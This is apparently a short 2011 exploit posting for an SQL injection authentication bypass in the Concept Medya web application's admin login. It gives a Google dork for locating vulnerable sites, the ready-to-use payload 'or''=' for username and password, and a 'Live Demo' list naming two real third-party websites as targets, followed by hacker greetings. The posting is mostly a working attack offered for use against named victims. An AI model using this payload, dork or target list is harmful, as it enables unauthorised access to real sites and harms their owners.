Concept Medya suffers from a remote SQL injection vulnerability that allows for authentication bypass.
c30c22bff3358d55ea9bb9a1e6521bde60e29737d60cb37e4152ea08efd4c9c7
# Exploit Title: Concept Medya Admin Auth ByPass
# Date: 13 June 2011
# Author: CriminalCoder
# Category: webapps
# Google dork: inurl:login_kontrol.asp
# Tested on: Windows Xp SP3
# Home: spyroot.in & rootarea.com
[+] Default admin panel : https://localhost/login_kontrol.asp
[+] ByPass the admin auth by using
Username : 'or''='Password : 'or''='
[+] Live Demo ;
[+] https://www.yesilmeninsaat.com/login_kontrol.asp[+] https://www.davedgroup.com/login_kontrol.asp
Greetz; NosLeeP++ - Redd.é - SanaLTahriP - TechnicaL - TheMirkin